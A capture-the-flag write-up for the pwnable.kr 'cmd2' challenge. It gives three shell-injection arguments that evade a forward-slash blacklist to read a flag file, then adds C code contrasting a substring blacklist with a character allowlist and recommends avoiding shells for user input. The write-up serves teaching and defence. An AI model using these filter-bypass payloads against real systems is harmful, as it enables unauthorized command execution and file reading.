15 - cmd2
The Challenge
Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission... but I wanna play anytime I want!
ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)
The Solution
Another blacklisting challenge, this time on steroids. The greatest hurdle is the prohibition on using forward slash.

Solution #1 - Octal Encoding
dash supports octal encoding [not hex]. It's important to surround the argument with single quotes so printf won't execute in the calling shell before the string is passed to cmd2 as an argument.
./cmd2 '$(printf "\57bin\57cat fla*")'
Solution #2 - Builtin Secrets
Bash has a builtin named command. It can be used with the flag -p to perform the command lookup with a default value of PATH instead of the current one.
./cmd2 'command -p cat fla*'
Solution #3 - ${PWD}
If you navigate to the root directory, $PWD will equal, well, a forward slash.
./cmd2 'cd ..;cd ..; ${PWD}bin${PWD}cat ${PWD}home${PWD}cmd2${PWD}fla*'
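Why all three arguments get through, as an added example that is not the challenge's source or part of the original write-up: a substring blacklist passes each of them, while a character allowlist rejects each of them. The function names are hypothetical and the blocked tokens are assumed; only the forward slash is named above.

```c
#include <stdio.h>
#include <string.h>

/* Assumed blacklist: only "/" is named in the write-up; the other tokens are
   hypothetical stand-ins for "some filters". */
static const char *const BLOCKED[] = { "/", "=", "PATH", "export", "`", "flag" };

/* Blacklist check: returns 1 if any blocked substring occurs in cmd. */
int blacklist_rejects(const char *cmd) {
    for (size_t i = 0; i < sizeof BLOCKED / sizeof BLOCKED[0]; i++)
        if (strstr(cmd, BLOCKED[i]) != NULL)
            return 1;
    return 0;
}

/* Allowlist check: accept only letters, digits, space, '.', '_' and '-'.
   Shell metacharacters ($ ( ) { } ; * \ and quotes) fail because they are
   not listed, not because someone remembered to block them. */
int allowlist_accepts(const char *cmd) {
    static const char OK[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ._-";
    return cmd[0] != '\0' && strspn(cmd, OK) == strlen(cmd);
}

/* The three arguments from the write-up, exactly as cmd2 receives them. */
const char *const PAYLOADS[] = {
    "$(printf \"\\57bin\\57cat fla*\")",
    "command -p cat fla*",
    "cd ..;cd ..; ${PWD}bin${PWD}cat ${PWD}home${PWD}cmd2${PWD}fla*",
};
enum { N_PAYLOADS = sizeof PAYLOADS / sizeof PAYLOADS[0] };

int main(void) {
    /* Print the verdict of each check for every payload. */
    for (int i = 0; i < N_PAYLOADS; i++)
        printf("blacklist=%s allowlist=%s  %s\n",
               blacklist_rejects(PAYLOADS[i]) ? "reject" : "pass",
               allowlist_accepts(PAYLOADS[i]) ? "pass" : "reject",
               PAYLOADS[i]);
    return 0;
}
```

An allowlist narrows the input, but the sturdier fix is to not hand user input to a shell at all: run a fixed program with an argument vector instead of a command string.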